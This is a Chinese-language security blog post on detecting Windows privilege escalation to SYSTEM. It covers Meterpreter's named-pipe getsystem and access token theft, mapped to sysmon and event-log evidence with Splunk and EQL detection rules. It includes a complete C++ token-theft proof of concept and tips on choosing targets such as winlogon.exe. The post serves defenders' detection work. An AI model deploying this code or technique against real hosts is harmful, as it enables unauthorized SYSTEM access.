

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar.jpg">
  <link rel="icon" href="/img/avatar.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="慕长风">
  <meta name="keywords" content="">
  
    <meta name="description" content="在《基于异常行为检测CobaltStrike》中，简单提及过 CobaltStrike 的提权方式，当时受限于篇幅，没有深入研究，本文会详细分解部分常见提权手法的攻击原理和检测技巧。">
<meta property="og:type" content="article">
<meta property="og:title" content="走进Windows中的提权行为">
<meta property="og:url" content="https://muchangfeng.com/2022/01/18/%E8%B5%B0%E8%BF%9BWindows%E4%B8%AD%E7%9A%84%E6%8F%90%E6%9D%83%E8%A1%8C%E4%B8%BA/index.html">
<meta property="og:site_name" content="慕长风的小酒馆">
<meta property="og:description" content="在《基于异常行为检测CobaltStrike》中，简单提及过 CobaltStrike 的提权方式，当时受限于篇幅，没有深入研究，本文会详细分解部分常见提权手法的攻击原理和检测技巧。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://photo.moofeng.cn/typora/1*BC5GMjHPkE3n2qLJSn-QoA.png">
<meta property="article:published_time" content="2022-01-18T06:30:09.000Z">
<meta property="article:modified_time" content="2022-02-16T09:09:56.964Z">
<meta property="article:author" content="慕长风">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://photo.moofeng.cn/typora/1*BC5GMjHPkE3n2qLJSn-QoA.png">
  
  
  <title>走进Windows中的提权行为 - 慕长风的小酒馆</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://cdn.staticfile.org/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"muchangfeng.com","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"pDqTgkge6AYMMtLKaVJCILFv-gzGzoHsz","app_key":"b4RgBYwktF5lnglCRU472Azq","server_url":null,"path":"window.location.pathname","ignore_local":true}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>

  
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>慕长风的小酒馆</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/banner.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          <span id="subtitle" title="走进Windows中的提权行为">
            
          </span>
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-01-18 14:30" pubdate>
          2022年1月18日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          7.2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          18 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">走进Windows中的提权行为</h1>
            
            <div class="markdown-body">
              
              <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>在 <a target="_blank" rel="noopener" href="https://blog.moofeng.cn/wei-xie-shou-lie/ji-yu-yi-chang-hang-wei-jian-ce-cobaltstrike#privilege-escalation">《基于异常行为检测CobaltStrike》</a> 一文里，简单提及过 CobaltStrike 的提权方式，当时受限于篇幅，没有深入研究</p>
<p>最近看了几篇文章，结合对一些数据源的思考，想在这里汇总下部分常见提权手法的攻击原理和检测技巧</p>
<p>本文主要关注 GetSystem 的过程，对应 ATT&amp;CK 攻击框架中的 <a target="_blank" rel="noopener" href="https://attack.mitre.org/techniques/T1134/">T1134 - Access Token Manipulation</a>，不涉及 UAC bypass</p>
<p>因为相关名词较多，例如 logon session 和 access token，过程理解可能需要一定的前置知识</p>
<p>这些都写进来怕显得文章又臭又长，以后有精力再另起一篇总结下知识背景吧</p>
<p>以下主要选择两种技术对象作为演示实例—— <strong>命名管道提权</strong> 和 <strong>访问令牌窃取</strong></p>
<h1 id="命名管道提权"><a href="#命名管道提权" class="headerlink" title="命名管道提权"></a>命名管道提权</h1><p>还是从最经典的 meterpreter 中的 getsystem 命令讲起，因为有 <a target="_blank" rel="noopener" href="https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/namedpipe.c">源码</a> 可供参考，更方便读者理解</p>
<p>其代码注释中也简单解释了下工作原理和前置条件：</p>
<blockquote>
<p>Elevate from local admin to local system via Named Pipe Impersonation. </p>
<p>We spawn a cmd.exe under local  system which then connects to our named pipe and we impersonate this client. </p>
<p>This can be done by an Administrator without the need for     .  </p>
<p>Works on 2000, XP, 2003 and 2008 for all local administrators. On Vista and 7 it will only work if the host process has been elevated through UAC first. Does not work on NT4.</p>
</blockquote>
<p>该技术的核心在于对 <strong>ImpersonateNamedPipeClient</strong> API 的利用，通过命名管道的服务端进程模仿客户端进程的访问令牌，获取 SYSTEM 权限</p>
<p>关于该 API 的详细说明，具体内容可以参考 <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-impersonatenamedpipeclient">官方文档</a></p>
<p>当然，想调用它，前提是进程具备 SeImpersonatePrivilege 的权限，而这通常意味着我们已经是 Admin 用户了</p>
<p><img src="http://photo.moofeng.cn/typora/image-20220105154303792.png" srcset="/img/loading.gif" lazyload alt="image-20220105154303792"></p>
<p>对照源代码，我大致拆解了下该模块具体的实现步骤：</p>
<ol>
<li>getsystem 新建一个线程创建命名管道并等待服务发来的连接 (服务端)</li>
<li>getsystem 创建了一个以 SYSTEM 权限运行的 Windows 服务，该服务会向命名管道发起连接 (客户端)</li>
<li>启动该服务，向目标命名管道发起连接 (客户端 -&gt; 服务端)</li>
<li>该进程(服务端)接收连接，调用 ImpersonateNamedPipeClient，从而模仿了 SYSTEM 权限的访问令牌</li>
<li>完成提权过程后，停止并删除该服务</li>
</ol>
<p>先简单的复现一下，然后让我们去日志中一一验证 getsystem 的行为轨迹</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111152102728.png" srcset="/img/loading.gif" lazyload alt="image-20220111152102728"></p>
<h2 id="第一步：创建命名管道"><a href="#第一步：创建命名管道" class="headerlink" title="第一步：创建命名管道"></a>第一步：创建命名管道</h2><p>这一步在 sysmon 中有对应的 EID 17 (Pipe Created) 日志记录，很容易就能观测到</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111154635530.png" srcset="/img/loading.gif" lazyload alt="image-20220111154635530"></p>
<p>另外，在时间节点附近，结合该进程对应的 Guid 我们还能看到它更多的动作，文中后半部分有所演示</p>
<h2 id="第二步：创建服务"><a href="#第二步：创建服务" class="headerlink" title="第二步：创建服务"></a>第二步：创建服务</h2><p>这一步我们可以借助 Windows 系统日志观测到 EID 7045 (A new service was installed in the system) 的事件发生</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111154934427.png" srcset="/img/loading.gif" lazyload alt="image-20220111154934427"></p>
<p>不过我习惯了使用 sysmon，但是其日志类型中并没有涉及到 Windows 服务，那是不是就束手无策了呢？</p>
<p>这里需要了解一个小窍门：<strong>Windows 安装服务的时候会写入注册表的特定位置</strong></p>
<p>这一知识可以应用在检测 Windows 可疑服务的创建，比如注册表键值中包含 powershell 敏感命令、base64 编码、特殊路径等</p>
<p>那么借助以下命令，我们就能定位到这一步创建的服务名称和命令参数等信息</p>
<p><code>index=windows EventCode=13  TargetObject=&quot;HKLM\\System\\CurrentControlSet\\Services\\*\\ImagePath&quot;</code></p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111155131191.png" srcset="/img/loading.gif" lazyload alt="image-20220111155131191"></p>
<p>从上图结果中能很明显的看出，该服务启动后(此时尚未启动)会向服务端的命名管道写入数据</p>
<h2 id="第三步：启动服务，连接管道"><a href="#第三步：启动服务，连接管道" class="headerlink" title="第三步：启动服务，连接管道"></a>第三步：启动服务，连接管道</h2><p>关于 Windows 服务的启动，这里有个很有意思的细节</p>
<p>本来我还愁找不到相应的系统日志来监测服务的启动行为，但是经过多次实验后，却发现每次都会伴随着 EID 7009 (服务连接超时)的发生</p>
<p>这时我才留意到源码中的这行注释，突然想起来，类似 cmd.exe 这种非有效的服务，它不会向服务管理器返回信号</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111184553363.png" srcset="/img/loading.gif" lazyload alt="image-20220111184553363"></p>
<p>例如，如果我们在命令行中手动创建个简易的服务，然后再看看事件管理器中的系统日志</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111185403757.png" srcset="/img/loading.gif" lazyload alt="image-20220111185403757"></p>
<p>由此引起的 EID 7009，同样可以作为我们判断 getsystem 命令执行过程中启动服务的证据</p>
<p>而服务启动后，我们可以结合前面分析的命令行参数，检索到其触发 EID 1(Process Create) 的相应动作</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111160006673.png" srcset="/img/loading.gif" lazyload alt="image-20220111160006673"></p>
<p>该命令向服务端命名管道发起连接，这一行为会被 sysmon 的 EID 18 (Pipe Connected) 记录到</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111155833635.png" srcset="/img/loading.gif" lazyload alt="image-20220111155833635"></p>
<h2 id="第四步：调用-API，完成提权"><a href="#第四步：调用-API，完成提权" class="headerlink" title="第四步：调用 API，完成提权"></a>第四步：调用 API，完成提权</h2><p>API 的调用暂无对应日志记录，但是可以根据用户名(User)和进程完整性(IntegrityLevel)等字段定位到提权的结果</p>
<p>如果这时我们在 MSF 的控制台执行 shell 命令，可以看到一个 SYSTEM 权限的 cmd.exe 诞生，而其父进程却是非 SYSTEM 权限</p>
<p>这一特征也标识着整个提权行为的顺利完成，更多的原理细节和检测步骤可以参考文章后半部分的内容</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111160418525.png" srcset="/img/loading.gif" lazyload alt="image-20220111160418525"></p>
<h2 id="第五步：删除服务"><a href="#第五步：删除服务" class="headerlink" title="第五步：删除服务"></a>第五步：删除服务</h2><p>最后一步容易被很多人忽视——痕迹清除，这一行为在成熟的攻击框架中做得很到位，但同时也有利于我们做行为检测分析</p>
<p>我也是通过分析源码才记起来加上这一检测点，从而在日志中发现了服务删除的动作</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111161147096.png" srcset="/img/loading.gif" lazyload alt="image-20220111161147096"></p>
<h1 id="访问令牌窃取"><a href="#访问令牌窃取" class="headerlink" title="访问令牌窃取"></a>访问令牌窃取</h1><p>除了上面例子中使用到的 ImpersonateNamedPipeClient 之外，还有一些 Windows API 也能帮助我们完成到 SYSTEM 权限的提升</p>
<p>例如 ImpersonateLoggedOnUser、DuplicateTokenEx 等等</p>
<p><img src="http://photo.moofeng.cn/typora/1*BC5GMjHPkE3n2qLJSn-QoA.png" srcset="/img/loading.gif" lazyload></p>
<p>以上图右边最经典的提权路线为例，我简单解释下各步骤：</p>
<ol>
<li>通过 <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess">OpenProcess</a> 获取 SYSTEM 权限进程的句柄</li>
<li>通过 <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocesstoken">OpenProcessToken</a> 获取该进程的访问令牌</li>
<li>通过 <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetokenex">DuplicateTokenEx</a> 函数复制该令牌</li>
<li>通过 <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw">CreateProcessWithTokenW</a> 创建具备同样访问令牌的进程</li>
</ol>
<p>贴一段自己测试时使用的代码，参考 <a target="_blank" rel="noopener" href="https://github.com/slyd0g/PrimaryTokenTheft">https://github.com/slyd0g/PrimaryTokenTheft</a> 修改而来</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;windows.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;iostream&gt;</span></span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span>** argv)</span> </span>&#123;<br>    <span class="hljs-comment">// Grab PID from command line argument</span><br>	<span class="hljs-type">char</span> *pid_c = argv[<span class="hljs-number">1</span>];<br>	DWORD PID_TO_IMPERSONATE = <span class="hljs-built_in">atoi</span>(pid_c);<br>	HANDLE tokenHandle = <span class="hljs-literal">NULL</span>;<br>	HANDLE duplicateTokenHandle = <span class="hljs-literal">NULL</span>;<br>	STARTUPINFOW startupInfo;<br>	PROCESS_INFORMATION processInformation;<br>	<span class="hljs-type">wchar_t</span> cmdline[] = <span class="hljs-string">L&quot;C:\\Windows\\System32\\cmd.exe&quot;</span>;<br>	<span class="hljs-built_in">ZeroMemory</span>(&amp;startupInfo, <span class="hljs-built_in">sizeof</span>(STARTUPINFO));<br>	<span class="hljs-built_in">ZeroMemory</span>(&amp;processInformation, <span class="hljs-built_in">sizeof</span>(PROCESS_INFORMATION));<br>	startupInfo.cb = <span class="hljs-built_in">sizeof</span>(STARTUPINFO);	<br><br>	HANDLE processHandle = <span class="hljs-built_in">OpenProcess</span>(PROCESS_QUERY_INFORMATION, <span class="hljs-literal">true</span>, PID_TO_IMPERSONATE);<br>	<span class="hljs-keyword">if</span> (<span class="hljs-built_in">GetLastError</span>() == <span class="hljs-literal">NULL</span>)<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] OpenProcess() success!\n&quot;</span>);<br>	<span class="hljs-keyword">else</span><br>	&#123;<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] OpenProcess() Return Code: %i\n&quot;</span>, processHandle);<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] OpenProcess() Error: %i\n&quot;</span>, <span class="hljs-built_in">GetLastError</span>());<br>	&#125;<br>	BOOL getToken = <span class="hljs-built_in">OpenProcessToken</span>(processHandle, TOKEN_DUPLICATE, &amp;tokenHandle);<br>	<span class="hljs-keyword">if</span> (<span class="hljs-built_in">GetLastError</span>() == <span class="hljs-literal">NULL</span>)<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] OpenProcessToken() success!\n&quot;</span>);<br>	<span class="hljs-keyword">else</span><br>	&#123;<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] OpenProcessToken() Return Code: %i\n&quot;</span>, getToken);<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] OpenProcessToken() Error: %i\n&quot;</span>, <span class="hljs-built_in">GetLastError</span>());<br>	&#125;<br>	BOOL duplicateToken = <span class="hljs-built_in">DuplicateTokenEx</span>(tokenHandle, TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY, <span class="hljs-literal">NULL</span>, SecurityImpersonation, TokenPrimary, &amp;duplicateTokenHandle);	<br>	<span class="hljs-keyword">if</span> (<span class="hljs-built_in">GetLastError</span>() == <span class="hljs-literal">NULL</span>)<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] DuplicateTokenEx() success!\n&quot;</span>);<br>	<span class="hljs-keyword">else</span><br>	&#123;<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] DuplicateTokenEx() Return Code: %i\n&quot;</span>, duplicateToken);<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] DupicateTokenEx() Error: %i\n&quot;</span>, <span class="hljs-built_in">GetLastError</span>());<br>	&#125;		<br>	BOOL createProcess = <span class="hljs-built_in">CreateProcessWithTokenW</span>(duplicateTokenHandle, LOGON_WITH_PROFILE, <span class="hljs-string">L&quot;C:\\Windows\\System32\\cmd.exe&quot;</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, &amp;startupInfo, &amp;processInformation);<br>	<span class="hljs-keyword">if</span> (<span class="hljs-built_in">GetLastError</span>() == <span class="hljs-literal">NULL</span>)<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] Process spawned!\n&quot;</span>);<br>	<span class="hljs-keyword">else</span><br>	&#123;<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] CreateProcessWithTokenW Return Code: %i\n&quot;</span>, createProcess);<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] CreateProcessWithTokenW Error: %i\n&quot;</span>, <span class="hljs-built_in">GetLastError</span>());<br>	&#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>



<p>这个过程建议大家有时间的话还是自己手动操作一遍，其中有很多坑需要留意，但是对于我们加深理解很有帮助</p>
<p>比如我测试时发现好几次 OpenProcess() 成功了，但是 OpenProcessToken() 却报出 <strong><a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/debug/system-error-codes--0-499-">ERROR_ACCESS_DENIED (0x5)</a></strong> 的错误</p>
<p>后来才知道原来是因为我不是该进程的 <strong>TOKEN_OWNER</strong></p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111112539038.png" srcset="/img/loading.gif" lazyload alt="image-20220111112539038"></p>
<p>另外，选择具备 SYSTEM 权限的目标时，要注意 <strong>Protected Process Light</strong> (PPL) 这个特性</p>
<p>受 PPL 保护的进程需要指定 <strong>PROCESS_QUERY_LIMITED_INFORMATION</strong> 权限时才能执行 OpenProcess()，不然也会报错</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111112752666.png" srcset="/img/loading.gif" lazyload alt="image-20220111112752666"></p>
<p>针对该特点，也有非常典型的攻击手法，例如 winlogon.exe 具备 SYSTEM 权限但又不受该机制保护，所以经常被利用</p>
<p>关于上述提到所需要的进程访问权限等相关信息，更多内容可以参考 <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights">这里</a></p>
<p>更多的实现原理和过程步骤，我就不再赘述了，感兴趣的可以根据这篇 <a target="_blank" rel="noopener" href="https://posts.specterops.io/understanding-and-defending-against-access-token-theft-finding-alternatives-to-winlogon-exe-80696c8a73b">文章</a> 逐步复现</p>
<p>接下来，我会根据复现结果的日志，借助 sysmon 和 splunk 完成 getsystem 过程中的细节分析</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111115038323.png" srcset="/img/loading.gif" lazyload alt="image-20220111115038323"></p>
<p>首先结合前面的结论，通过对父子进程的权限继承关系进行判断，定位到相关进程主体</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111170426088.png" srcset="/img/loading.gif" lazyload alt="image-20220111170426088"></p>
<p>拿到父进程的 Guid —— {534e2476-46b7-61dd-5508-000000000b00}，然后溯源其相关行为</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cmd">index=windows (ParentProcessGuid=&quot;&#123;<span class="hljs-number">534</span>e2476-<span class="hljs-number">46</span>b7-<span class="hljs-number">61</span>dd-<span class="hljs-number">5508</span>-<span class="hljs-number">000000000</span>b00&#125;&quot; OR ProcessGuid=&quot;&#123;<span class="hljs-number">534</span>e2476-<span class="hljs-number">46</span>b7-<span class="hljs-number">61</span>dd-<span class="hljs-number">5508</span>-<span class="hljs-number">000000000</span>b00&#125;&quot; OR SourceProcessGUID=&quot;&#123;<span class="hljs-number">534</span>e2476-<span class="hljs-number">46</span>b7-<span class="hljs-number">61</span>dd-<span class="hljs-number">5508</span>-<span class="hljs-number">000000000</span>b00&#125;&quot; OR TargetProcessGuid=&quot;&#123;<span class="hljs-number">534</span>e2476-<span class="hljs-number">46</span>b7-<span class="hljs-number">61</span>dd-<span class="hljs-number">5508</span>-<span class="hljs-number">000000000</span>b00&#125;&quot;)<br></code></pre></td></tr></table></figure>

<p>这其中，我们能发现一条很显眼的日志，由 token.exe 向 winlogon.exe 发起的进程间访问，注意它的访问权限</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111172317547.png" srcset="/img/loading.gif" lazyload alt="image-20220111172317547"></p>
<p><em>PS：sysmon 的 EID 10 中相应字段名为 ProcessGUID，而不是 ProcessGuid</em></p>
<p>这里对应的就是我们代码中 OpenProcess() 的过程，因为日志里 0x1400 的访问权限正是 PROCESS_QUERY_INFORMATION</p>
<p><img src="https://photo.moofeng.cn/typora/image-20220111172237905.png" srcset="/img/loading.gif" lazyload alt="image-20220111172237905"></p>
<p>这条日志紧随其后的行为便是上述的 token.exe 进程创建了 SYSTEM 权限的 cmd.exe</p>
<p>其中的 OpenProcessToken()、DuplicateTokenEx() 等行为就不是 sysmon 的能力范围了</p>
<p>关于这一点，我们需要熟悉 sysmon 的日志记录原理 ——</p>
<p>“为了检测 ProcessAccess 类型的日志，sysmon 采用了 <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/fltkernel/nf-fltkernel-fltregisterfilter">ObRegisterCallbacks</a> 注册线程、进程和桌面句柄操作的回调列表，以便任何进程尝试使用 <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-ntopenprocess">OpenProcess()</a>, <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-ntopenprocess">NtOpenProcess()</a>, NtAlpcOpenSenderProcess() 等API打开其他进程的句柄时都能够被检测到”</p>
<p>写到这里了想偷个懒，针对该攻击技术，我就直接引用一段国外研究员用 EQL 写的一段检测语句吧：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs c">sequence with maxspan=<span class="hljs-number">1</span>m<br>  [process where event.code : <span class="hljs-string">&quot;10&quot;</span> and<br>	 <span class="hljs-comment">/*</span><br><span class="hljs-comment">	  GrantedAccess values in scope</span><br><span class="hljs-comment">	  0x1000 - PROCESS_QUERY_LIMITED_INFORMATION - PPL</span><br><span class="hljs-comment">	  0x1400 - PROCESS_QUERY_INFORMATION</span><br><span class="hljs-comment">	  0x1F3FFF - PROCESS_ALL_ACCESS</span><br><span class="hljs-comment">	 */</span><br>     winlog.event_data.GrantedAccess : <br>               (<span class="hljs-string">&quot;0x1000&quot;</span>, <span class="hljs-string">&quot;0x1400&quot;</span>, <span class="hljs-string">&quot;0x1F3FFF&quot;</span>) and <br>     winlog.event_data.TargetUser : <span class="hljs-string">&quot;NT AUTHORITY\\SYSTEM&quot;</span> and not <br>     winlog.event_data.SourceUser : <span class="hljs-string">&quot;NT AUTHORITY\\*&quot;</span> and <br>     winlog.event_data.TargetImage : <span class="hljs-string">&quot;?:\\Windows\\*.exe&quot;</span>] by process.entity_id<br> [process where event.code : <span class="hljs-string">&quot;1&quot;</span> and <br>    winlog.event_data.LogonId : <span class="hljs-string">&quot;0x3e7&quot;</span> and <br>    winlog.event_data.TerminalSessionId : <span class="hljs-string">&quot;1&quot;</span> and <br>    not winlog.event_data.ParentUser : <span class="hljs-string">&quot;NT AUTHORITY\\*&quot;</span>] by process.parent.entity_id<br></code></pre></td></tr></table></figure>

<p>本质上就是对前面两个检测点做关联分析，只要前面的研究功夫下到位了，这里能施展的空间才会充足</p>
<p>像本文中的第一个例子，分析命名管道提权的手法时，涉及的检测点比较丰富，这时在上层做复杂规则检测就会有更多可作为的地方</p>
<h1 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h1><p>要做好威胁检测，对攻击和防御两方面的知识都得做到烂熟于心，真正做到知己知彼其实需要长时间的积累</p>
<p>上述分析过程主要用到 sysmon 记录日志，但涉及到 Windows API 的调用，sysmon 其实是不足以胜任的</p>
<p>我自己在实际分析过程中，经常遇到找不到相应日志的情况，这时如果对日志记录原理的缺乏了解，往往会无从下手</p>
